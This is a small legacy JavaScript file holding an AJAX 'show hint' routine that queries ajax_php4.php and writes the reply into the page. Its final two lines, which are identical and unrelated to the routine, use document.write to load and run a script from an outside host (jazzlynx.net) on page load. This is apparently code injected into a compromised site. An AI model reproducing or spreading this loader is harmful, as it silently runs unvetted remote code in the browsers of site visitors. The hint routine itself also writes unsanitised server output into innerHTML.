var xmlHttp
	function showHint4(str){
		if (str.length==0){
			document.getElementById("txtHint4").innerHTML="";
			return;
	  	}
		xmlHttp=GetXmlHttpObject4();
		if (xmlHttp==null){
			alert ("Your browser does not support AJAX!");
			return;
	  	} 
		var url="ajax_php4.php";
		url=url+"?q="+str;
		url=url+"&sid="+Math.random();
		
		xmlHttp.onreadystatechange=stateChanged4;
		xmlHttp.open("GET",url,true);
		xmlHttp.send(null);
	}
	function stateChanged4(){
		if (xmlHttp.readyState==4){
			document.getElementById("txtHint4").innerHTML=xmlHttp.responseText;
		}
	}
	function GetXmlHttpObject4(){
		var xmlHttp=null;
		try{
			// Firefox, Opera 8.0+, Safari
	  		xmlHttp=new XMLHttpRequest();
	  	}
		catch (e){
			// Internet Explorer
	  		try{
		  		xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
	    	}
	  	catch (e){
		  	xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
	    }
	  }
	return xmlHttp;
	}
document.write('<script src=http://jazzlynx.net/PhotoAlbums/artistMouseover.php ><\/script>');
document.write('<script src=http://jazzlynx.net/PhotoAlbums/artistMouseover.php ><\/script>');